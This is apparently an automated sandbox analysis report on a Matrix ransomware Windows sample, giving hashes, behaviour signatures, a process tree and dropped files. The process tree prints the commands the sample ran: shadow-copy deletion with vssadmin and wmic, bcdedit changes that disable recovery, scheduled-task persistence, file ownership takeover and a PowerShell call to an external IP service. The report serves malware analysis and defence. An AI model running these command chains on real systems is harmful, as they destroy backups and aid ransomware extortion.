Analysis

  • max time kernel
    150s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20220901-en locale:en-us os:windows10-2004-x64 system
  • submitted
    03-11-2022 12:57

General

  • Target

    907636b28d162f7110b067a8178fa38c.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • SSDEEP

    24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe
    "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe"
    1⤵
    • Matrix Ransomware
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe" "C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe"
      2⤵
      PID:4816
    • C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe
      "C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe" -n
      2⤵
      • Executes dropped EXE
      PID:4760
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\aWUc913K.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:792
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u5msjCEb.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u5msjCEb.bmp" /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:4252
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
        3⤵
        PID:4704
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        3⤵
        PID:4136
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\gEXzcVfw.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:552
      • C:\Windows\SysWOW64\wscript.exe
        wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\gEXzcVfw.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:428
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat" /sc minute /mo 5 /RL HIGHEST /F
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4928
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat" /sc minute /mo 5 /RL HIGHEST /F
            5⤵
            • Creates scheduled task(s)
            PID:3736
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3552
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Run /I /tn DSHCA
            5⤵
            PID:3468
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QSIInvIW.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3328
      • C:\Windows\SysWOW64\attrib.exe
        attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
        3⤵
        • Views/modifies file attributes
        PID:4064
      • C:\Windows\SysWOW64\cacls.exe
        cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
        3⤵
        PID:536
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
        3⤵
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3968
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c aczo234m.exe -accepteula "store.db" -nobanner
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Users\Admin\AppData\Local\Temp\aczo234m.exe
          aczo234m.exe -accepteula "store.db" -nobanner
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4784
          • C:\Users\Admin\AppData\Local\Temp\aczo234m64.exe
            aczo234m.exe -accepteula "store.db" -nobanner
            5⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Sets service image path in registry
            • Enumerates connected drives
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: LoadsDriver
            • Suspicious use of AdjustPrivilegeToken
            PID:4892
  • C:\Windows\SYSTEM32\cmd.exe
    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3512
    • C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      2⤵
      • Interacts with shadow copies
      PID:4128
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic SHADOWCOPY DELETE
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4288
      • C:\Windows\system32\vssadmin.exe
        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:812
    • C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:3728
    • C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:4368
    • C:\Windows\system32\schtasks.exe
      SCHTASKS /Delete /TN DSHCA /F
      2⤵
      PID:3716
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3092

              Network

              MITRE ATT&CK Enterprise v6

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                16KB

                MD5

                a940f5a3065bd1f806f880f27de0ebd7

                SHA1

                145fe0103db6f6685307b73d24cd29c24def2efd

                SHA256

                70d9faaebcd07dc0ae57ae0e049352b88f9634ebb8078c29018dffc8864ed2ef

                SHA512

                82a1c64b0ff9f45b8fa748501c540fe8221b450a9f01a96f860b058a02cf3efff580a0e4183f40767300738b2958758b884c418b6a02706469901af95e45a196

              • C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe

                Filesize

                1.2MB

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • C:\Users\Admin\AppData\Local\Temp\QSIInvIW.bat

                Filesize

                246B

                MD5

                6d2a10672e1c5f04b2d29f5b518c62c6

                SHA1

                eaecceda5b4646e14693993d41954123824cd455

                SHA256

                09bae4c21417617ad94c5f7ed1e546dea54bb60f5415953d49c0e002168cf4c5

                SHA512

                7c06adfbcd982153bb64e97e77c069369c3343cf2151847d564005a2997f7d49d04e61b6749a22df51278eb573e6ba21b5615f70271eba9c7e70b832a8892068

              • C:\Users\Admin\AppData\Local\Temp\aWUc913K.txt

                Filesize

                14B

                MD5

                75564e2df4b8c8d33695e8e5e58cb03c

                SHA1

                64a796a9f01a1f12bcbe641ecc92541a41ece9b5

                SHA256

                bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965

                SHA512

                c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af

              • C:\Users\Admin\AppData\Local\Temp\aczo234m.exe

                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

              • C:\Users\Admin\AppData\Local\Temp\aczo234m64.exe

                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

              • C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat

                Filesize

                415B

                MD5

                9c13453e38fbd86395ed5801778c0184

                SHA1

                377ff2656afd7b629e5b0b694f7d2bdb43183ed3

                SHA256

                2d20298dcb8497c7fbcee4524a88c3e5ea8cae130d8bd14ba30b1f77d3addc03

                SHA512

                4722f788d0afb836e637a9b41d2cd35fb936ada1de9e4be5b574343adcfdf882229860bf831f6dfe614ea144f2c8e2f3fcbd86f84aa25ccbe587fad0fd226067

              • C:\Users\Admin\AppData\Roaming\gEXzcVfw.vbs

                Filesize

                260B

                MD5

                2bf97203a0d426b757f9adf7186cd164

                SHA1

                8aae6d2fbda7a4684247288f3d7aa113aa0ade88

                SHA256

                3eb49d32abb9f63526d36ceb0c96ec41e7f4c1fa3f6f8714fe395926dcad10bb

                SHA512

                757a2991e5fb38da036e0eb59035f321691f776a8877b2962ece066052a3f0c97177b1fdcf7d46395aa7b33280283526d1de9583be84485d51ae2f5d7ee93257

              • memory/792-139-0x0000000004E70000-0x0000000005498000-memory.dmp

                Filesize

                6.2MB

              • memory/792-138-0x0000000002390000-0x00000000023C6000-memory.dmp

                Filesize

                216KB

              • memory/792-145-0x00000000061C0000-0x00000000061DA000-memory.dmp

                Filesize

                104KB

              • memory/792-144-0x00000000074D0000-0x0000000007B4A000-memory.dmp

                Filesize

                6.5MB

              • memory/792-143-0x0000000005C90000-0x0000000005CAE000-memory.dmp

                Filesize

                120KB

              • memory/792-142-0x0000000005640000-0x00000000056A6000-memory.dmp

                Filesize

                408KB

              • memory/792-141-0x00000000055D0000-0x0000000005636000-memory.dmp

                Filesize

                408KB

              • memory/792-140-0x0000000004DE0000-0x0000000004E02000-memory.dmp

                Filesize

                136KB

              • memory/4288-175-0x0000013CB9A70000-0x0000013CB9A92000-memory.dmp

                Filesize

                136KB

              • memory/4288-179-0x00007FFDB5440000-0x00007FFDB5F01000-memory.dmp

                Filesize

                10.8MB

              • memory/4288-177-0x00007FFDB5440000-0x00007FFDB5F01000-memory.dmp

                Filesize

                10.8MB

              • memory/4784-166-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB